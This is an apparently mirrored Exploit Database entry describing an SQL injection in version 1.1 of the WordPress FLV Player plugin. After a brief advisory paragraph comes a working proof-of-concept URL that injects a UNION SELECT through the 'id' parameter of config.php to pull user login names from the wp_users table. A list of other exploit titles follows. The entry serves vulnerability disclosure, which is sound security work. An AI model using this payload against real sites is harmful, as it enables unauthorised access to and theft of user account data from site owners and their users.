WordPress Plugin FLV Player – ‘id’ SQL Injection

Exploit Database
16 阅读

作者： Ashiyane Digital Security Team

日期： 2012-11-07
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38012/

source: https://www.securityfocus.com/bid/56418/info

The FLV Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

FLV Player 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/hitasoft_player/config.php?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,user_login,10,11,12,13,14,15,16,17 from wp_users--

last Exploits
WordPress Plugin FLV Player – ‘id’ SQL Injection的更多信息

interuse Website Builder & design – ‘index2.php’ SQL Injection：
Ektron CMS400.NET 7.5.2 – Multiple Vulnerabilities：
Gr8 Tutorial Script – SQL Injection：
Multi Vendor Mall – ‘pages.php’ SQL Injection：
Flexmonster Pivot Table & Charts 2.7.17 – ‘Remote JSON’ Reflected XSS：
WordPress Plugin Ultimate Product Catalog 3.8.1 – Privilege Escalation：
mygamingladder MGL Combo System 7.5 – ‘game.php’ SQL Injection：
Files Desk Pro 1.4 iOS – Local File Inclusion：